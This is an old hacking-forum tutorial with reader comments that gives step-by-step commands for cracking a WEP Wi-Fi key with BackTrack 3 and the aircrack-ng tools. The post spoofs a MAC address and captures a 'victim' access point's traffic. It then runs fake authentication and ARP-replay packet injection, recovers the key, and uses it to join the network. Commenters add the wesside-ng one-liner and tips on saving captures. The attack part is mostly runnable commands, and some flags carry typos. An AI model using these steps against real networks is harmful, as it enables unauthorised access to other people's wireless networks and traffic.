Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Cracking Wep Keys With BackTrack


Cracking Wep Keys With BackTrack

By ghostghost | 168423 Reads |
0     0

This is my first tutorial…. I hope this helps all of you that just don’t know where to start or don’t know how to crack wep… What you will need

  • 1 copy of BackTrack 3 newest release http://www.remote-exploit.org/backtrack.html (GOOGLE IT)
  • 1 wireless router
  • Laptop with wireless capabilities/wireless card – There are a few cards that can’t do the injection!!!
  • A secure place to work (so you don’t disturb other AP’s)

In order to crack a WEP key you must have a large number of encrypted packets to work with. This is an unavoidable requirement if you wish to be successful. The best way to get a large number of packets is to perform an ARP request re injection attack (otherwise known as attack -3). In order to do this attack and get results there must be a client already authenticated with the AP, or connecting to the AP.


Here are some things you need to know before you get confused When you see this (device) or (bssid) you DON’T put the ( )!!! (device) = Your wireless card *can be seen by typing in iwconfig EG: eth0, eth1, ath0, ath1 (bssid) = This is the victims bssid *when you start airodump-ng if there is a AP in range it will show up on the left side will look similar to 00:11:22:33:44:55


Now before we start we need to make a txt file in the home folder. On the desktop you will see 2 icons home and system. Duble click the home icon, rigt click the blank white area and select create new Txt File name it exidous or what ever you want! click ok, now close the window.

				Ok let's start!

Commands | Meaning

*open up 3 shell konsoles by clicking the little black box next to the start button. 

* The first thing were going to do is stop the device aka ethernet card

airmon-ng stop ath0

* Now were going to put the wireless card down, so we can fake a mac adress  (to see 	available wireless cards type, 	iwconfig

ifconfig (device) down

* Ok now just to make things simpler, so we don't have to hunt down what our Mac 	address is

macchanger –mac 00:11:22:33:44:55 (device)

* Now were going to start the wireless card *make it listen for AP's

airmon-ng start (device)

* Lets start seeing what AP's are there

airodump-ng (device)

* After you see all the AP's execute the following command to stop it and copy the 	bssid

CTRL+C Copy bssid of victom

* Now on to the victim's AP (were listening in for authentication packets

airodump-ng -c 6 -w Exidous –bssid (Bssid) (device)

* Lets get on with making more Data, and start the injection process

aireplay-ng -l 0 -a (bssid) -h 00:11:22:33:44:55 (device)

* Now were going to inject the router ***this sometimes takes a while to actually 	inject!

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (device)

* On to cracking the key, ***AFTER GETTING AT LEAST 5,000 Data/IV's for 64 bit 	encryption / AFTER GETTING AT LEAST 		10,000 Data/IV's for 128 bit 	encryption

aircrack-ng -n 64 –bssid (bssid) exidous-01.cap

* Once you crack the wep key you wright it down, and reboot to windows. Now put it in the username and the password 		with out the :

EG: Wep Key = 33:C7:C6:09:30 When Entered into username and password it will look like this. 33C7C60930

I hope this tut. Helped!!! If so please send $$…. JK!!! Just leave a comment and rate it!

Comments
ghost's avatar
ghost 16 years ago

Good article. Though faking the mac address doesn't always work 100%. I set up a wireless network to play around with BT3, and I had trouble arp injecting with a fake mac address, then I switched it back to my original and presto, problem solved… A little advise for the article however, go more into detail with the commands, didn't feel like I got a good enough explanation of those. Good work though, keep it up.

richohealey's avatar
richohealey 16 years ago

you're a paint by numbers skid.

ghost's avatar
ghost 16 years ago

Well thanks for taking the time to look at it.. and i am going to do a second article, but it will be on how to do Chop Chop method… and I will go a little further in detail about the commands, and other commands you can use! (Make it totally noob friendly)

Uber0n's avatar
Uber0n 16 years ago

This sure is useful information, but it doesn't explain how anything works. Just a step-by-step skiddie guide :|

ghost's avatar
ghost 16 years ago

nice one but you use the old methods backtack 3 has wesside-ng

wesside-ng -i (device)

ofcouse u have to put the card in monitor mode either using airmone-ng or wlanconfig

ghost's avatar
ghost 16 years ago

Great article, i was having a lot of trouble with backtrack (im not that much of a linux guy)…

ghost's avatar
ghost 16 years ago

Everybody take a good look, this is a quality example of spoon-feeding.

rated poor, for.. obvious reasons.

ghost's avatar
ghost 15 years ago

I just got my BackTrack 3 installed on my Eee PC 901 a few days ago. Too bad that the WLAN chip inside 901 isn't injection capable.

Blunt's avatar
Blunt 15 years ago

Great but with step 7 -w exdious if your using a live cd you need to format a usb drive with ext.3 by using mkfs.ext /dev/(your device) so you can save your ivs

-w /dev/sda1 or what evre usb is mounted to sdc1 sda1 hda1 whatever

ghost's avatar
ghost 15 years ago

@ Blunt "Go smoke another one!" Your completely wrong. I have never installed babcktrack3. I have always ran it from cd or usb, And have never had a problem with step 7. All you have to do is open the home folder on desktop right click and make a txt file name it what ever u want… That is all.

ghost's avatar
ghost 15 years ago

I agree with Uber0n, I'd rather not be stuck knocking unwanted clients off my network.

ghost's avatar
ghost 15 years ago

what are some good usb wireless adapters that support injection? My netbook (Acer Aspire One) doesn't. PM if anyone knows any. In the mean time, I'll Google it. thanks.

ghost's avatar
ghost 14 years ago

it's late to be asking this, but did mirage find any usb's for injection that function well with acers?

also, it might be slower, but you can still crack it with acers. highly sudguest using password files though.

also, check into airbase for acer tops. it proves usefull sometimes.

Wish I could find an easier way to see what computer bssid's are connected to the router though….